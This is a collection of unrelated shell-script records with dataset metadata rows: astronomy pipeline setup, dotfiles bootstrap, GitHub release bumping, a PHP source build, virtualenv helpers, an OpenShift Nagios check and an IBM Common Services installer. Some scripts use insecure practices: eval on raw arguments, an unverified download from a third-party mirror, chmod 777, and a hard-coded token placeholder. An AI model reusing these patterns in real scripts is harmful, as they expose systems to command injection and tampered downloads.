# Revision-3 INTEGRAL archive root; all input science windows come from here.
export REP_BASE_PROD=/isdc/arc/rev_3
#export ISDC_REF_CAT=/unsaved_data/ferrigno/INTEGRAL/nrt_refr_cat.fits
#export ISDC_OMC_CAT=/isdc/arc/rev_3/cat/omc/omc_refr_cat.fits
#export ISDC_ENV=/gpfs0/ferrigno/INTEGRAL/osa11
#source $ISDC_ENV/bin/isdc_init_env.sh
#echo $ISDC_ENV
export COMMONLOG=comlog.txt
echo "Analysis is done on"
hostname
echo $PWD
export COMMONSCRIPT=1
# Revolution number = first four characters of the science-window ID.
export REVNO=`echo $OGID | cut -b1-4`
export COMMONLOGFILE=+log.$OGID
unset DISPLAY
# Fresh observation-group directory with a private PFILES area so parallel
# grid jobs do not clobber each other's parameter files.
rm -rf obs/${OGID}J1
mkdir -p obs/${OGID}J1/pfiles
export PFILES="${PWD}/obs/${OGID}J1/pfiles;${ISDC_ENV}/pfiles:$HEADAS/syspfiles"
echo $PFILES
echo $HOSTNAME
### OG CREATION
#
echo "$OGID" > /tmp/$$.So.lis
cat /tmp/$$.So.lis
og_create \
idxSwg=/tmp/$$.So.lis \
ogid=${OGID}J1 baseDir=./ instrument=JMX1 obs_id=""
rm /tmp/$$.So.lis
### ANALYSIS
#METHOD 1
cd obs/${OGID}J1
#cp ../../isgri_srcl_res_oao1654.fits user_cat.fits
#cp ../../isgri_srcl_res_3A1822.fits user_cat.fits
#cp ../../isgri_srcl_res_v0332_clean.fits user_cat.fits
#cp ../../isgri_srcl_res_V404.fits user_cat.fits
#cp ../../isgri_srcl_res_velax1.fits user_cat.fits
#cp ../../gc2193_isgri_srcl_res_clean.fits user_cat.fits
cp ../../archived_cat_lists/maxi_isgri_srcl_res.fits user_cat.fits
export master_file=ic_master_file.fits
#j_rebin_rmf ic_master=${REP_BASE_PROD}/idx/ic/${master_file} jemx_num=1 binlist=STD_008 outfile=jmx1_rebinned_rmf.fits
export curr_dir=$PWD
#skipLevels="LCR"
# JEM-X 1 pipeline from COR to LCR with spectra skipped: one channel band
# (46-178), IROS light curves in 3000 s steps with burst search enabled.
# NOTE(review): "skipSPEfirstScw = 'y'" has spaces around '=' -- most OSA
# tools expect "param=value"; confirm the parameter is actually picked up.
jemx_science_analysis ogDOL="${curr_dir}/og_jmx1.fits[1]" jemxNum=1 startLevel="COR" endLevel="LCR" \
skipLevels="SPE" chatter=2 clobber=yes osimData=no ignoreScwErrors=no skipSPEfirstScw = 'y' \
timeStart=-1 timeStop=-1 nPhaseBins=0 phaseBins="" radiusLimit=122 IC_Group="${REP_BASE_PROD}/idx/ic/${master_file}[1]" \
nChanBins=1 chanLow="46" chanHigh="178" \
IC_Alias="OSA" instMod="" response="jmx1_rebinned_rmf.fits" arf="" \
LCR_useIROS=yes LCR_timeStep=3000 LCR_doBurstSearch=yes \
IMA_burstImagesOut=yes \
CAT_I_usrCat=user_cat.fits
#nChanBins="2" chanLow="46 129" chanHigh="128 178" \
#nChanBins=-1 chanHigh="" chanLow="" \
#CAT_I_usrCat=user_cat.fits
#CAT_I_usrCat="$ISDC_REF_CAT" \
#CAT_I_usrCat="$REP_BASE_PROD/gnrl_refr_cat_0041_20180811.fits"
# chanLow="46 130" chanHigh="129 174" \
echo "JEM-X science window analysis finished up to spectral level. Results can be found under:"
echo $PWD
| true
|
b73a09532a5fc625747159059bff8b88becbe1f7
|
Shell
|
nadeemahmad/dotfiles
|
/files/.bash_profile
|
UTF-8
| 400
| 3.546875
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# First-run bootstrap: clone the dotfiles repo into ~/.base and build it,
# then hand the session off to zsh when available, else fall back to bash.
export BASE_DIR="${HOME}/.base"
if [ ! -d "${BASE_DIR}" ]; then
git clone --recursive --quiet "git@github.com:nadeemahmad/dotfiles.git" "${BASE_DIR}"
bash "${BASE_DIR}/build.sh"
fi
# Load common configuration
if [ -f ~/.profile ]; then
source ~/.profile
fi
# Load zsh if it's available
# `exec -l` replaces this bash with a login zsh, so ~/.bashrc is only
# sourced when zsh is absent at the hard-coded /usr/local/bin path.
if [ -x /usr/local/bin/zsh ]; then
exec -l /usr/local/bin/zsh
else
source ~/.bashrc
fi
| true
|
e83412e26e82a4739c8c78d4a2e1b87b487c3ed8
|
Shell
|
sharksync/sharktank
|
/create-github-release.sh
|
UTF-8
| 1,409
| 3.5
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Read the latest GitHub release tag, bump its last numeric component,
# create the new release, and kick off the grunt post-build for it.
# Check dependencies.
set -e
xargs=$(which gxargs || which xargs)
# Validate settings.
[ "$TRACE" ] && set -x
# Arguments are "key=value" settings (owner=..., repo=..., github_api_token=...).
# NOTE(review): eval-ing raw arguments executes arbitrary shell -- only ever
# invoke this script with trusted input.
CONFIG=$@
for line in $CONFIG; do
eval "$line"
done
# Define variables.
GH_API="https://api.github.com"
GH_REPO="$GH_API/repos/$owner/$repo"
GH_RELEASES="$GH_REPO/releases"
AUTH="Authorization: token $github_api_token"
WGET_ARGS="--content-disposition --auth-no-challenge --no-cookie"
CURL_ARGS="-LJO#"
# Validate token.
curl -o /dev/null -sH "$AUTH" $GH_REPO || { echo "Error: Invalid repo, token or network issue!"; exit 1; }
# Read latest release
releasesResponse=$(curl -sH "$AUTH" "$GH_RELEASES/latest")
# Get version of the last release
version=$(echo "$releasesResponse" | grep -oP '(?<="tag_name": ")[^"]*')
echo "Found version: $version"
# Increment the final dot-separated component, carrying into the previous
# component on overflow and preserving zero-padding.
nextVersion=$(echo $version | awk -F. -v OFS=. 'NF==1{print ++$NF}; NF>1{if(length($NF+1)>length($NF))$(NF-1)++; $NF=sprintf("%0*d", length($NF), ($NF+1)%(10^length($NF))); print}')
echo "Next version: $nextVersion"
# Create a new release
curl -sH "$AUTH" --data "{\"tag_name\":\"$nextVersion\",\"target_commitish\":\"master\",\"name\":\"$nextVersion\",\"body\":\"Release of version $nextVersion. You can deploy this version using https://s3-eu-west-1.amazonaws.com/io.sharksync.builds/$nextVersion/cloudformation.yaml\",\"draft\":false,\"prerelease\":false}" $GH_RELEASES
npm run-script grunt postBuild:$nextVersion
| true
|
35cd6a9baec84207b63784903afe456f7e50c015
|
Shell
|
remainlife/linux
|
/shell/lnmp_php-7.2.2.sh
|
UTF-8
| 3,190
| 2.859375
| 3
|
[] |
no_license
|
#!/bin/bash
# LNMP stack: build and install PHP 7.2.2 from source.
# author ctocode-zwj <982215226@qq.com>
# Create the www user and group when they do not already exist.
user=www
group=www
#create group if not exists
egrep "^$group" /etc/group >& /dev/null
if [ $? -ne 0 ]
then
groupadd "$group"
fi
#create user if not exists
egrep "^$user" /etc/passwd >& /dev/null
if [ $? -ne 0 ]
then
# FIX: the login shell was misspelled "/sbin/nolgin"; use the real nologin
# binary so the service account is blocked from interactive logins by the
# intended mechanism rather than by a nonexistent path.
useradd -g "$group" -s /sbin/nologin "$user"
fi
# Build prerequisites for PHP and its bundled extensions.
yum -y install wget vim pcre pcre-devel openssl openssl-devel libicu-devel gcc gcc-c++ autoconf libjpeg libjpeg-devel libpng libpng-devel freetype freetype-devel libxml2 libxml2-devel zlib zlib-devel glibc glibc-devel glib2 glib2-devel ncurses ncurses-devel curl curl-devel krb5-devel libidn libidn-devel openldap openldap-devel nss_ldap jemalloc-devel cmake boost-devel bison automake libevent libevent-devel gd gd-devel libtool* libmcrypt libmcrypt-devel mcrypt mhash libxslt libxslt-devel readline readline-devel gmp gmp-devel libcurl libcurl-devel openjpeg-devel
# Start from a clean source tree.
rm -rf php-7.2.2
# Mirror the 64-bit LDAP libs into /usr/lib -- presumably so PHP's configure
# finds them there; TODO confirm still needed.
cp -frp /usr/lib64/libldap* /usr/lib/
if [ ! -f php-7.2.2.tar.gz ];then
#wget https://cn2.php.net/distributions/php-7.2.2.tar.gz
wget https://f.9635.com.cn/linux/php-7.2.2.tar.gz
fi
tar zxvf php-7.2.2.tar.gz
# NOTE(review): 777 on the build tree is overly permissive; 755 would do
# unless the build deliberately runs as a different user.
chmod -R 777 php-7.2.2
cd php-7.2.2
# Configure PHP 7.2.2: php-fpm running as www, mysqlnd-based database
# drivers, and the common extension set; install prefix /alidata/server/php.
./configure --prefix=/alidata/server/php \
--with-config-file-path=/alidata/server/php/etc \
--enable-fpm \
--with-fpm-user=www \
--with-fpm-group=www \
--enable-mysqlnd \
--with-mysqli=mysqlnd \
--with-pdo-mysql=mysqlnd \
--enable-mysqlnd-compression-support \
--with-iconv-dir \
--with-freetype-dir \
--with-jpeg-dir \
--with-png-dir \
--with-zlib \
--with-libxml-dir \
--enable-xml \
--disable-rpath \
--enable-bcmath \
--enable-shmop \
--enable-sysvsem \
--enable-inline-optimization \
--with-curl \
--enable-mbregex \
--enable-mbstring \
--enable-intl \
--with-mcrypt \
--with-libmbfl \
--enable-ftp \
--with-gd \
--enable-gd-jis-conv \
--enable-gd-native-ttf \
--with-openssl \
--with-mhash \
--enable-pcntl \
--enable-sockets \
--with-xmlrpc \
--enable-zip \
--enable-soap \
--with-gettext \
--disable-fileinfo \
--enable-opcache \
--with-pear \
--enable-maintainer-zts \
--with-ldap=shared \
--without-gdbm
# FIX: the line above used to end with a trailing backslash, which made the
# CPU_NUM assignment part of ./configure's argument list -- CPU_NUM was never
# set in the shell, the comparison below errored out, and the parallel -j
# build was never selected.
CPU_NUM=$(grep -c processor /proc/cpuinfo)
if [ "$CPU_NUM" -gt 1 ];then
make ZEND_EXTRA_LIBS='-liconv' -j"$CPU_NUM"
else
make ZEND_EXTRA_LIBS='-liconv'
fi
make install
cd ..
# Install default config: development php.ini plus the init.d wrapper.
cp ./php-7.2.2/php.ini-development /alidata/server/php/etc/php.ini
cp ./php-7.2.2/php-fpm-72 /etc/init.d/php-fpm-72
chmod a+x /etc/init.d/php-fpm-72
# Drop the last line of php.ini -- presumably a stray trailing marker;
# TODO confirm which line this removes.
sed -i '$d' /alidata/server/php/etc/php.ini
cp /alidata/server/php/etc/php-fpm.conf.default /alidata/server/php/etc/php-fpm.conf
cp /alidata/server/php/etc/php-fpm.d/www.conf.default /alidata/server/php/etc/php-fpm.d/www.conf
# systemd unit so php-fpm starts at boot; the quoted "EOF" delimiter keeps
# $MAINPID literal for systemd instead of being expanded by the shell.
cat > /usr/lib/systemd/system/php-fpm.service<<"EOF"
[Unit]
Description=The PHP FastCGI Process Manager
After=syslog.target network.target
[Service]
Type=simple
PIDFile=/alidata/server/php/var/run/php-fpm.pid
ExecStart=/alidata/server/php/sbin/php-fpm --nodaemonize --fpm-config /alidata/server/php/etc/php-fpm.conf
ExecReload=/bin/kill -USR2 $MAINPID
[Install]
WantedBy=multi-user.target
EOF
systemctl enable php-fpm.service
systemctl start php-fpm.service
sleep 5
| true
|
9da01594acb5bc24d53a30dfb374757614670ac9
|
Shell
|
maxkao/dotfiles-22
|
/etc/bash/07-bashrc.virtualenvwrapper.sh
|
UTF-8
| 7,543
| 3.640625
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/usr/bin/env bash
### bashrc.virtualenvwrapper.sh
#
# Installing Virtualenvwrapper:
# apt:
# sudo apt-get install virtualenvwrapper
# pip:
# [sudo] pip install -U pip virtualenvwrapper
#
## Configure dotfiles/virtualenv root/prefix environment variables
# __WRK workspace root
# PROJECT_HOME virtualenvwrapper project directory (mkproject)
# WORKON_HOME virtualenvwrapper virtualenv prefix
# VIRTUAL_ENV=${WORKON_HOME}/${VIRTUAL_ENV_NAME}
# _APP=${VIRTUAL_ENV_NAME} #[/subpath]
# _SRC=${VIRTUAL_ENV}/${_APP}
# _WRD=${VIRTUAL_ENV}/${_APP}
# _setup_virtualenvwrapper_default_config() -- standard layout:
# workspace under ~/workspace, virtualenvs under ~/.virtualenvs.
# Respects a pre-set $__WRK.
_setup_virtualenvwrapper_default_config() {
    local wrk="${__WRK:-"${HOME}/workspace"}"
    export __WRK="${wrk}"
    export PROJECT_HOME="${wrk}"
    export WORKON_HOME="${HOME}/.virtualenvs"
}
# _setup_virtualenvwrapper_dotfiles_config() -- dotfiles layout:
# workspace at ~/-wrk, virtualenv prefix at ~/-wrk/-ve37.
# Pre-set $__WRK / $WORKON_HOME win over the defaults.
_setup_virtualenvwrapper_dotfiles_config() {
    if [ -z "${__WRK}" ]; then
        __WRK="${HOME}/-wrk"
    fi
    export __WRK
    export PROJECT_HOME="${__WRK}"
    if [ -z "${WORKON_HOME}" ]; then
        WORKON_HOME="${__WRK}/-ve37"
    fi
    export WORKON_HOME
}
function _setup_virtualenvwrapper_dirs {
# _setup_virtualenvwrapper_dirs() -- create $__WRK, $PROJECT_HOME and
# $WORKON_HOME; umask 027 keeps newly created dirs group-readable only.
# NOTE(review): with `mkdir -p || chmod`, the chmod runs only when mkdir
# FAILS; since mkdir -p succeeds on existing directories, pre-existing dirs
# never get o-rwx stripped. If tightening permissions was the intent, this
# probably wanted `&&` -- confirm before changing.
umask 027
mkdir -p "${__WRK}" || chmod o-rwx "${__WRK}"
mkdir -p "${PROJECT_HOME}" || chmod o-rwx "${PROJECT_HOME}"
mkdir -p "${WORKON_HOME}" || chmod o-rwx "${WORKON_HOME}"
}
function _setup_virtualenvwrapper_config {
# _setup_virtualenvwrapper_config() -- configure $VIRTUALENVWRAPPER_* and
# source virtualenvwrapper.sh (preferring /usr/local, then ~/.local, then
# whatever an augmented PATH resolves); prints an error when not found.
#export VIRTUALENVWRAPPER_SCRIPT="/usr/local/bin/virtualenvwrapper.sh"
#export VIRTUALENVWRAPPER_SCRIPT="${HOME}/.local/bin/virtualenvwrapper.sh"
export VIRTUALENVWRAPPER_HOOK_DIR="${__DOTFILES}/etc/virtualenvwrapper"
export VIRTUALENVWRAPPER_LOG_DIR="${PROJECT_HOME}/.virtualenvlogs"
# FIX: this test was `-n`, so the preferred interpreter paths only applied
# when the variable was ALREADY set and could never take effect otherwise;
# the `-z` + command -v fallback below shows the intent is "set when unset".
if [ -z "${VIRTUALENVWRAPPER_PYTHON}" ]; then
if [ -x "/usr/local/bin/python" ]; then
export VIRTUALENVWRAPPER_PYTHON="/usr/local/bin/python"
elif [ -x "${HOME}/.local/bin/python" ]; then
export VIRTUALENVWRAPPER_PYTHON="${HOME}/.local/bin/python"
# elif "${VIRTUAL_ENV}/bin/python" ## use extra-venv python
fi
fi
if [ -x "/usr/local/bin/virtualenvwrapper.sh" ]; then
export VIRTUALENVWRAPPER_SCRIPT="/usr/local/bin/virtualenvwrapper.sh"
fi
# if [ -n "${__IS_MAC}" ]; then # for brew python
# Search an augmented PATH (without mutating the real one) for anything
# still unset.
local _PATH="${HOME}/.local/bin:/usr/local/bin:${PATH}"
if [ -z "${VIRTUALENVWRAPPER_SCRIPT}" ]; then
VIRTUALENVWRAPPER_SCRIPT=$( (PATH="${_PATH}"; command -v virtualenvwrapper.sh))
export VIRTUALENVWRAPPER_SCRIPT
fi
if [ -z "${VIRTUALENVWRAPPER_PYTHON}" ]; then
VIRTUALENVWRAPPER_PYTHON=$( (PATH="${_PATH}"; command -v python))
export VIRTUALENVWRAPPER_PYTHON
fi
unset VIRTUALENV_DISTRIBUTE
if [ -n "${VIRTUALENVWRAPPER_SCRIPT}" ]; then
# shellcheck disable=1090
source "${VIRTUALENVWRAPPER_SCRIPT}"
else
echo "Err: VIRTUALENVWRAPPER_SCRIPT:=${VIRTUALENVWRAPPER_SCRIPT} # 404"
fi
}
function lsvirtualenvs {
# lsvirtualenvs() -- list virtualenvs in $WORKON_HOME (detected by the
# presence of a lib/pythonX.Y directory, oldest first via ls -t -r).
# If any arguments are given, run them as a command once per venv name
# instead of printing it.
# NOTE(review): this parses `ls` output, so venv names containing spaces
# or newlines will be mangled -- acceptable only while names stay simple.
cmd=( "${@}" )
(cd "${WORKON_HOME}" &&
for venv in $(ls -adtr "${WORKON_HOME}/"**/lib/python?.? | \
sed "s:$WORKON_HOME/\(.*\)/lib/python[0-9]\.[0-9]:\1:g"); do
if [ -n "${cmd[*]}" ]; then
"${cmd[@]}" "${venv}" ;
else
echo "${venv}" ;
fi
done)
}
# lsve() -- shorthand alias for lsvirtualenvs; forwards all arguments.
lsve() {
    lsvirtualenvs "$@"
}
function backup_virtualenv {
# backup_virtualenv() -- backup VIRTUAL_ENV_NAME $1 to [$2]
# $1 -- venv directory name under $WORKON_HOME
# $2 -- optional backup dir (default: $WORKON_HOME/_venvbkps/<timestamp>)
# Writes <bkpdir>/venvstrbkp.<name>.<timestamp>.tar.gz; echoes the
# archive name on success, an "err:" line to stderr on failure.
local venvstr="${1}"
local _date
_date="$(date +'%FT%T%z')"
bkpdir="${2:-"${WORKON_HOME}/_venvbkps/${_date}"}"
test -d "${bkpdir}" || mkdir -p "${bkpdir}"
archivename="venvstrbkp.${venvstr}.${_date}.tar.gz"
archivepath="${bkpdir}/${archivename}"
# NOTE(review): 'return 2' runs inside the ( ) subshell, so it sets the
# subshell's status; the final 'return $?' then propagates it — confirm.
(cd "${WORKON_HOME}" || return; \
( tar czf "${archivepath}" "${venvstr}" \
&& echo "# archivename=${archivename}" ) \
|| (echo "err: ${venvstr} (${archivename})" >&2; return 2))
return $?
}
function backup_virtualenvs {
# backup_virtualenvs() -- backup all virtualenvs in $WORKON_HOME to [$1]
# Each venv is archived via backup_virtualenv; successes are appended to
# <bkpdir>/venvbkps.list, failures to <bkpdir>/venvbkps.err.
date=$(date +'%FT%T%z')
bkpdir=${1:-"${WORKON_HOME}/_venvbkps/${date}"}
echo BKPDIR="${bkpdir}"
test -d "${bkpdir}" || mkdir -p "${bkpdir}"
lsvirtualenvs
venvs=$(lsvirtualenvs)
# Word-splitting of ${venvs} is intentional here (one venv name per word).
(cd "${WORKON_HOME}" || return; \
for venv in ${venvs}; do
backup_virtualenv "${venv}" "${bkpdir}" \
2>> "${bkpdir}/venvbkps.err" \
| tee -a "${bkpdir}/venvbkps.list"
done)
cat "${bkpdir}/venvbkps.err"
echo BKPDIR="${bkpdir}"
}
function dx {
# dx() -- 'deactivate'
# Runs 'deactivate' when that function is defined, otherwise falls back
# to 'dotfiles_postdeactivate'.
# NOTE(review): both calls run inside ( ) subshells, so any environment
# changes they make do not reach the current shell — confirm intentional.
(declare -f 'deactivate' > /dev/null 2>&1 \
&& deactivate) || \
(declare -f 'dotfiles_postdeactivate' > /dev/null 2>&1 \
&& dotfiles_postdeactivate)
}
function _rebuild_virtualenv {
# rebuild_virtualenv() -- rebuild a virtualenv, leaving pkgs in place
# $1="$VENVSTR"
# $2="$VIRTUAL_ENV"
# Deletes venv-infrastructure files (pip/setuptools/activate/python) from
# site-packages, re-creates the venv with mkvirtualenv, then rewrites the
# shebang of every script in bin/ to point at the new interpreter.
echo "rebuild_virtualenv()"
VENVSTR="${1}"
VIRTUAL_ENV=${2:-"${WORKON_HOME}/${VENVSTR}"}
_BIN="${VIRTUAL_ENV}/bin"
#rm -fv ${_BIN}/python ${_BIN}/python2 ${_BIN}/python2.7 \
#${_BIN}/pip ${_BIN}/pip-2.7 \
#${_BIN}/easy_install ${_BIN}/easy_install-2.7 \
#${_BIN}/activate*
pyver=$(python -c "import sys; print('{}.{}'.format(*sys.version_info[:2]))")
_PYSITE="${VIRTUAL_ENV}/lib/python${pyver}/site-packages"
# NOTE(review): 'find -E' is BSD find (extended regex flag); GNU find
# would reject it — confirm this is only run on macOS.
find -E "${_PYSITE}" -iname 'activate*' -delete
find -E "${_PYSITE}" -iname 'pip*' -delete
find -E "${_PYSITE}" -iname 'setuptools*' -delete
find -E "${_PYSITE}" -iname 'distribute*' -delete
find -E "${_PYSITE}" -iname 'easy_install*' -delete
find -E "${_PYSITE}" -iname 'python*' -delete
declare -f 'deactivate' > /dev/null 2>&1 && deactivate
mkvirtualenv -i setuptools -i wheel -i pip "${VENVSTR}"
#mkvirtualenv --clear would delete ./lib/python<pyver>/site-packages
workon "${VENVSTR}" && \
we "${VENVSTR}"
_BIN="${VIRTUAL_ENV}/bin"
# Safety guard: refuse to rewrite shebangs under /bin.
if [ "${_BIN}" == "/bin" ]; then
echo "err: _BIN=${_BIN}"
return 1
fi
# Show the old shebangs, rewrite them in place, then show the new ones.
find "${_BIN}" -type f | grep -v '.bak$' | grep -v 'python*$' \
| xargs head -n1
find "${_BIN}" -type f | grep -v '.bak$' | grep -v 'python*$' \
| LC_ALL=C xargs sed -i.bak -E 's,^#!.*python.*,#!'"${_BIN}"'/python,'
find "${_BIN}" -name '*.bak' -delete
find "${_BIN}" -type f | grep -v '.bak$' | grep -v 'python*$' \
| xargs head -n1
echo "
# TODO: adjust paths beyond the shebang
#${_BIN}/pip install -v -v -r <(${_BIN}/pip freeze)
#${_BIN}/pip install -r ${_WRD}/requirements.txt
"
}
function rebuild_virtualenv {
# rebuild_virtualenv() -- rebuild a virtualenv, echoing each command
# $1="$VENVSTR"
# $2="$VIRTUAL_ENV"
# Runs in a subshell so the xtrace flag does not leak to the caller.
(
set -x
_rebuild_virtualenv "$@"
)
}
function rebuild_virtualenvs {
# rebuild_virtualenvs() -- run rebuild_virtualenv on every virtualenv
# found in $WORKON_HOME (enumerated by lsve).
lsve "rebuild_virtualenv"
}
_setup_virtualenvwrapper_dotfiles_config # ~/-wrk/-ve37 {-ve27,-ce27,-ce37}
function _setup_virtualenvwrapper {
# _setup_virtualenvwrapper() -- configure env vars and create work dirs.
# _setup_virtualenvwrapper_default_config # ~/.virtualenvs/
_setup_virtualenvwrapper_config
_setup_virtualenvwrapper_dirs
}
# Run setup whether executed or sourced.
# NOTE(review): with the guard commented out, both branches are identical;
# the 'else' arm was presumably meant to skip setup when
# VIRTUALENVWRAPPER_SCRIPT is already configured — confirm.
if [[ "${BASH_SOURCE[0]}" == "$0" ]]; then
_setup_virtualenvwrapper
else
#if [ -z "${VIRTUALENVWRAPPER_SCRIPT}" ]; then
_setup_virtualenvwrapper
#fi
fi
| true
|
6a3fd6bc4cd426546798bca63bfaf36f1ee6b7a6
|
Shell
|
phpmanual/br
|
/.compile.sh
|
UTF-8
| 332
| 2.78125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env sh
# Check out the Brazilian-Portuguese PHP documentation module, show the
# top of the tree, and render it to out/index.html.
# make the script fail for any failed command
set -e
# make the script display the commands it runs to help debugging failures
set -x
svn checkout https://svn.php.net/repository/phpdoc/modules/doc-pt_BR doc-pt_BR 1> /dev/null \
&& tree -L 2 \
&& mkdir -p out \
&& ./generate-html.php > out/index.html
| true
|
f4cc8d00d7f987c1002bcb1bfa9d22d9a816238a
|
Shell
|
voteleobrown/homebase
|
/scripts/install_vundle.sh
|
UTF-8
| 409
| 2.53125
| 3
|
[] |
no_license
|
echo "Cloning Vundle repository to $HOME/.vim/bundle/Vundle.vim"
git clone https://github.com/VundleVim/Vundle.vim.git ~/.vim/bundle/Vundle.vim
echo "Done."
echo "Deleting old Vundle configuration if present."
sed -i '/" BEGIN VUNDLE/,/" END VUNDLE/d' $HOME/.vimrc
echo "Inserting new configuration from vundle.txt."
cat vundle.txt >> $HOME/.vimrc
echo "Installing Vundle plugins."
vim +PluginInstall +qall
| true
|
299e4abaf6626ebad4a540bfb4181360214f110b
|
Shell
|
manbruh/MANBRUH
|
/bash/lab 2/improveddice.sh
|
UTF-8
| 1,593
| 4.3125
| 4
|
[] |
no_license
|
#!/bin/bash
#
# this script rolls a pair of six-sided dice and displays both the rolls
#
# Task 1:
# put the number of sides in a variable which is used as the range for the random number
# put the bias, or minimum value for the generated number in another variable
# roll the dice using the variables for the range and bias i.e. RANDOM % range + bias
# Task 2:
# generate the sum of the dice
# generate the average of the dice
# display a summary of what was rolled, and what the results of your arithmetic were
# Prompt for the die configuration.
echo "Enter number of sides:"
# number of faces per die (range of the random roll)
read sides
echo "Enter minimum value as range for rolling:"
# bias: smallest value a die can show (1 for a normal die)
read min
echo "Rolling..."
# Roll both dice: RANDOM % sides yields 0..sides-1, then add the bias.
die1=$(( RANDOM % $sides + $min ))
die2=$(( RANDOM % $sides + $min ))
# Sum of the two rolls.
sum=$(($die1 + $die2))
echo "The sum is: $sum"
# NOTE: integer division — the average is truncated (e.g. 3+4 -> avg 3).
avg=$(($sum / 2))
echo "The average is: $avg"
echo "Rolled $die1, $die2"
| true
|
d3895c118799d98a6454fcd0647d3906448c0e72
|
Shell
|
jc1518/OpenShiftV3-Nagios-Plugin
|
/openshift_pv_check.sh
|
UTF-8
| 1,837
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/bash
# Monitor Openshift V3 persisent storage usage
# Nagios plugin: for every pod in project $1, check disk usage of each
# mounted volume; warn above 80%, critical above 90%.
# Exit codes follow Nagios conventions: 0=OK 1=WARNING 2=CRITICAL 3=UNKNOWN.
project=$1
your_token='thisisyourtokenpleasekeepitsecure'
url='https://api.mycompany.openshift.com'
if [ -z $1 ]; then
echo "Project name is required"
exit 3
fi
export KUBECONFIG=/usr/local/nagios/libexec/kubeconfig
message_text="Disk Usage:"
# message_exit accumulates 1 per warning and 100 per critical volume.
message_exit=0
date > /tmp/ospv.log
/usr/bin/oc login $url --token=$your_token >> /tmp/ospv.log 2>&1
/usr/bin/oc project $project >> /tmp/ospv.log 2>&1
# All pods except build pods and the header line.
pods=$(/usr/bin/oc get pods | grep -v -e build -e NAME | awk '{print $1}')
for pod in $pods
do
# Persistent volumes only (kubernetes.io service-account mounts excluded).
volumes=$(/usr/bin/oc volume pod/$pod | grep 'mounted at' | grep -v 'kubernetes.io' | awk '{print $3}')
for volume in $volumes
do
# Usage percentage as reported by df inside the pod.
usage=$(/usr/bin/oc exec $pod -- df -h $volume | awk '{print $5}' | tail -1 | cut -d'%' -f1)
if [ $usage -gt 80 ] && [ $usage -lt 90 ]; then
message_temp_exit=1
message_temp_text="Warning - $volume is $usage% full!"
elif [ $usage -ge 90 ]; then
message_temp_exit=100
message_temp_text="Critical - $volume is $usage% full!"
else
message_temp_exit=0
message_temp_text="OK - $volume is $usage% full."
fi
let message_exit=${message_exit}+${message_temp_exit}
message_text=${message_text}' '${message_temp_text}
done
done
echo "$message_text"
# >=100 means at least one critical; >=1 at least one warning; a message
# with no "full" entries means nothing was checked -> UNKNOWN.
if [ $message_exit -ge 100 ]; then
exit 2
elif [ $message_exit -ge 1 ]; then
exit 1
elif [[ $(echo $message_text | grep -c full) -lt 1 ]]; then
exit 3
else
exit 0
fi
| true
|
9e45b2758df56070fee8f7cb58e9fc2bd052135b
|
Shell
|
ibm-avocados/docker-cp4i-2020.4
|
/scripts/install-cs.sh
|
UTF-8
| 4,660
| 3.609375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
# Copyright [2018] IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This function issues the CRD status command and looks for output with 5 separate lines each ending with "=True"
# It returns 0 if it finds these 5 lines or 1 otherwise (output doesn't match or status command fails)
# checkCommonServiceCRDComplete -- probe for the CommonService custom
# resource in ibm-common-services. Prints a status line and returns 0
# once the resource exists, 1 while it is still missing.
checkCommonServiceCRDComplete() {
    if oc get CommonService common-service -n ibm-common-services >/dev/null 2>&1; then
        echo "CommonService ready !"
        return 0
    fi
    echo "CommonService not ready yet"
    return 1
}
# usage -- print invocation help to stdout.
usage () {
    printf '%s\n' "Usage:" "install-cs.sh CLUSTER_NAME API_KEY ENTITLEMENT_REGISTRY_KEY"
}
if [ "$#" -ne 3 ]
then
usage
exit 1
fi
# Include utility functions
SCRIPT_PATH=$(dirname `realpath $0`)
source "$SCRIPT_PATH"/utils.sh
source "$SCRIPT_PATH"/vars.sh
# ACE DESIGNER CRD created flag.
COMMON_SERVICE_CRD_CREATED=0
echo "Installing Common Services ..."
echo ""
oc project >/dev/null 2>&1
if [ $? -ne 0 ]; then
echo "Need to authenticate again:"
echo "Authenticating with the cluster"
ibmcloud login --apikey $2 -r us-south
if [[ $? -ne 0 ]]; then
echo "Fatal error: login via ibmcloud cli"
exit 1
fi
sleep 2
ibmcloud oc cluster config --cluster $1 --admin
if [[ $? -ne 0 ]]; then
echo "Fatal error: cannot setup cluster access via ibmcloud cli config command"
exit 1
fi
else
echo "Still authenticated. Skipping authentication ..."
fi
# Check if successfully run already and exit w/success if it has
status=$(oc get cm cs-install-progress -n default -o "jsonpath={ .data['state']}" 2>/dev/null)
if [ "$status" = "complete" ]; then
echo "cs already completed successfully, skipping ..."
exit 0
elif [ "$status" != "started" ]; then
oc create cm cs-install-progress --from-literal=state=started -n default
if [ $? -ne 0 ]; then
echo "Fatal error: Could not create cs-install-progress config map"
exit 1
fi
fi
echo "Creating subscription to Common Services operator ..."
echo "Check if Common Services subscription exists ..."
oc get Subscription ibm-common-service-operator -n openshift-operators >/dev/null 2>&1
if [ $? -ne 0 ]; then
cat <<EOF | oc create -f -
apiVersion: operators.coreos.com/v1alpha1
kind: Subscription
metadata:
name: ibm-common-service-operator
namespace: openshift-operators
spec:
channel: stable-v1
installPlanApproval: Automatic
name: ibm-common-service-operator
source: opencloud-operators
sourceNamespace: openshift-marketplace
EOF
if [ $? -ne 0 ]; then
echo "Error creating subscription to Common Services operator"
exit 1
fi
# Give CSVs a chance to appear
echo "Wait 10 seconds to give CSVs a chance to appear"
sleep 10
else
echo "Subscription to ibm-common-service-operator already exists, skipping create ..."
sleep 2
fi
echo "Check for dependent operators to come up. Wait 15 minutes "
printf "Querying CSVs ..."
retry 60 checkCSVComplete $CS_CSV ibm-common-services
if [ $? -ne 0 ]; then
echo "Error: timed out waiting for operators in openshift-operators project"
exit 1
fi
